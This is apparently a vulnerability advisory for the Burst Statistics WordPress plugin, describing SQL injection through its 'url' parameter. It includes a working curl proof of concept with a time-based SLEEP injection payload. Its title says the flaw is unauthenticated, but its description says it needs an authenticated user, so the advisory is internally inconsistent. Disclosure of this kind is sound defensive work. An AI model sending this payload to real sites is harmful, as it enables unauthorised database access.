Burst Statistics (Free < 1.5.0, Pro < 1.5.1) - Unauthenticated SQL Injection

Description The plugins do not properly sanitise and escape the url parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated users, such as subscribers

PoC

curl ‘https://example.com/burst-statistics-endpoint.php’ \ -H ‘content-type: text/plain;charset=UTF-8’ \ --data-raw $‘"{\"fingerprint\":false,\"uid\":\"437a969907141c6c2042731efd2da038\",\"url\":\"https://example.com/abc\‘/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\’\\\“,\\\“time_on_page\\\”:6907,\\\“completed_goals\\\”:[]}”’ \ --compressed